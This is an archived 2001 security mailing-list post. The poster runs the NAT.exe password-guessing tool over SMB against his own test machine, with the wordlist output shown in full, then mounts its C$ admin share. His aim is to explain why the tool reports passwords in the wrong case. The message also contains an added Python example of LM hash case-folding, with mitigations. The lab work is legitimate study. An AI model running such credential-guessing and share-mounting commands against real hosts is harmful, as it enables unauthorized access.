Re: Using Null Session information from NAT.EXE

From: Windex King (WindexKing@mor-lan-d.com)
Date: Thu Nov 01 2001 - 10:36:15 PST

    Ian,
    
    I have tested a hunch I had about this and I 
    believe this is the answer you're looking for.
    
    Attacking machine: NT 4.0 SP6a
    Attacked machine:  W2K no SP
    
    First I confirmed the administrator password 
    on the to-be-attacked machine.
    
    C:\>net user administrator "WindexKing"
    The command completed successfully.
    
    ** Note: pwd contains capital letters W and K **
    
    Then I attacked using NAT.exe
    
    C:\>nat -o WindexKing.log -u administrator.txt -p WindexKing.pwd 192.168.68.33
    [*]--- Reading usernames from administrator.txt
    [*]--- Reading passwords from WindexKing.pwd
    
    [*]--- Checking host: 192.168.68.33
    [*]--- Obtaining list of remote NetBIOS names
    
    [*]--- Attempting to connect with name: *
    [*]--- Unable to connect
    
    [*]--- Attempting to connect with name: *SMBSERVER
    [*]--- CONNECTED with name: *SMBSERVER
    [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
    [*]--- Server time is Thu Nov 01 07:49:30 2001
    [*]--- Timezone is UTC-5.0
    [*]--- Remote server wants us to encrypt, telling it not to
    
    [*]--- Attempting to connect with name: *SMBSERVER
    [*]--- CONNECTED with name: *SMBSERVER
    [*]--- Attempting to establish session
    [*]--- Was not able to establish session with no password
    [*]--- Attempting to connect with Username: `AdminIstrator' Password: `foo'
    [*]--- Attempting to connect with Username: `AdminIstrator' Password: `bar'
    [*]--- Attempting to connect with Username: `AdminIstrator' Password: `windexking'
    [*]--- CONNECTED: Username: `AdminIstrator' Password: `windexking'
    
    Now I tried to use the password found by NAT.exe via net.exe
    
    c:\>net use * \\192.168.68.33\c$ "windexking" /u:administrator
    System error 1326 has occurred.
    
    Logon failure: unknown user name or bad password.
    
    
    c:\>net use * \\192.168.68.33\c$ "WindexKing" /u:administrator
    Drive E: is now connected to \\192.168.68.33\c$.
    
    The command completed successfully.
    
    
    My conclusion:
    
    NAT.exe is forcing LANMAN only authentication and therefore the 
    letters taken from the supplied wordlist are converted to uppercase
    as LANMAN expects.
    
    NAT.exe doesn't tell you that (other than the "Attempting to connect 
    with protocol: MICROSOFT NETWORKS 1.03" line) and simply reports the
    word from the wordlist which worked as it is presented in the wordlist.
    
    You can find a Cygwin compiled version of the SAMBA SMBclient at:
    http://www.hoobie.net/tools/index.html
    
    W	K
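The conclusion above rests on a property of the LM scheme: the password is upper-cased before anything else happens, so every case variant of the same word yields the same LM hash, whereas the NT hash (MD4 over UTF-16LE) preserves case. The following is an added illustration of that pre-processing step, not code from the original post or from NAT.exe or Samba; it stops at the key-derivation input (the DES and MD4 steps themselves are omitted and only named in comments), assumes an ASCII OEM code page, and adds a small audit helper that reports the LM properties of a given password (case folding, truncation at 14 bytes, and the constant second half for passwords of seven characters or fewer).

```python
"""
LM vs NT password pre-processing (added example; not from the original
post, NAT.exe or Samba). Shows why a check that only exercises LM
authentication is case-insensitive.
"""

LM_MAX_LEN = 14
# Real LM hash = DES_k1("KGS!@#$%") || DES_k2("KGS!@#$%"), where k1 and k2
# are the two 7-byte halves below. The DES step is deterministic, so
# identical halves always give an identical LM hash. DES is omitted here.
LM_MAGIC = b"KGS!@#$%"


def lm_prepare(password: str) -> tuple[bytes, bytes]:
    """Return the two 7-byte halves LM hashing feeds into DES.

    Order of operations in the LM scheme: upper-case, encode in the OEM
    code page (ASCII assumed here), truncate to 14 bytes, null-pad to 14,
    split 7/7. Because upper-casing comes first, "WindexKing" and
    "windexking" produce exactly the same halves.
    """
    raw = password.upper().encode("ascii", errors="replace")[:LM_MAX_LEN]
    raw = raw.ljust(LM_MAX_LEN, b"\x00")
    return raw[:7], raw[7:]


def nt_prepare(password: str) -> bytes:
    """Input to the NT hash: UTF-16LE of the password as typed.

    No case folding and no 14-byte limit; the MD4 step is omitted here.
    """
    return password.encode("utf-16-le")


def same_lm_input(a: str, b: str) -> bool:
    """True when two passwords would have the same LM hash."""
    return lm_prepare(a) == lm_prepare(b)


def same_nt_input(a: str, b: str) -> bool:
    """True when two passwords would have the same NT hash."""
    return nt_prepare(a) == nt_prepare(b)


def lm_audit(password: str) -> dict[str, bool]:
    """Audit helper: which LM weaknesses apply to this password.

    - case_folded: LM discards letter case (any password with a letter).
    - truncated:   characters beyond the 14th never reach the hash.
    - second_half_constant: 7 chars or fewer leaves the second 7-byte
      half all nulls, whose DES output is a well-known constant, so an
      attacker only has to recover the first half.
    """
    first, second = lm_prepare(password)
    return {
        "case_folded": password.upper() != password.lower(),
        "truncated": len(password) > LM_MAX_LEN,
        "second_half_constant": second == b"\x00" * 7,
    }


if __name__ == "__main__":
    # Constructed sample: the password from the post in two spellings.
    for pw in ("WindexKing", "windexking"):
        print(pw, lm_prepare(pw), nt_prepare(pw)[:8].hex())
    print("same LM input:", same_lm_input("WindexKing", "windexking"))
    print("same NT input:", same_nt_input("WindexKing", "windexking"))
    print("audit:", lm_audit("WindexKing"))
```

Running it shows both spellings collapse to the halves `WINDEXK` and `ING` plus padding on the LM side while their UTF-16LE inputs differ, which is exactly why a tool that only negotiates LM reports whichever case variant its wordlist contains. The usual mitigations follow from the same properties: disable LM hash storage and LM authentication where the environment allows it, and prefer passwords longer than 14 characters, which LM cannot represent at all.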
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
    
    This archive was generated by hypermail 2b30 : Thu Nov 01 2001 - 12:08:25 PST